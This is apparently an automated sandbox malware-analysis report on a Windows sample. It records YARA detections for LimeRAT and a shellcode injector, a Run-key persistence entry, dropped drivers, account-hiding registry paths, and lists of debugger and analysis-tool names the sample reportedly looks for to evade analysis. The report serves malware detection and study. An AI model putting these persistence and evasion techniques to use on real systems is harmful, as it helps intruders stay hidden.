Source: mpasbase.vdm.38.dr	Static PE information: real checksum: 0x329e303 should be:

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00411684 push esi; retn 000Ch
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00407A58 pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_0040980C push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00405E17 push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_004098A9 push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_00404531 pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5A21 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F626A push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1656 push es; ret
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1F3B push cs; retf
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F63E9 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9842 push edi; ret
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5486 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5480 push ebp; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F112C push ebp; retf
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6134 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F11A4 push ebp; retf
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F21B0 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F61D1 push esi; iretd

Source: ConfigSecurityPolicy.exe.44.dr

Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]

Source: MpCmdRun.exe.44.dr	Static PE information: section name: .didat
Source: NisSrv.exe.44.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe0.44.dr	Static PE information: section name: .didat
Source: MpClient.dll.44.dr	Static PE information: section name: .didat
Source: MpCommu.dll.44.dr	Static PE information: section name: .didat
Source: MpRtp.dll.44.dr	Static PE information: section name: .didat
Source: MpSvc.dll.44.dr	Static PE information: section name: .didat
Source: ProtectionManagement.dll.44.dr	Static PE information: section name: .didat
Source: MpClient.dll0.44.dr	Static PE information: section name: .didat

Source: initial sample

Static PE information: section name: .text entropy: 6.83637943712

Persistence and Installation Behavior:

Sample is not signed and drops a device driver

Show sources

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavbase.vdm

Boot Survival:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PERAMELINE			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PERAMELINE			Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57CB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp

Binary or memory string: KeServiceDescriptorTable

Contains functionality to hide user accounts

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: \microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\>HKLM\Software\Microsoft\Windows Defender Security Center\\\-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected generic Shellcode Injector

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Windows Security Disabler

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18349219133.00000138BD1CA000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXE
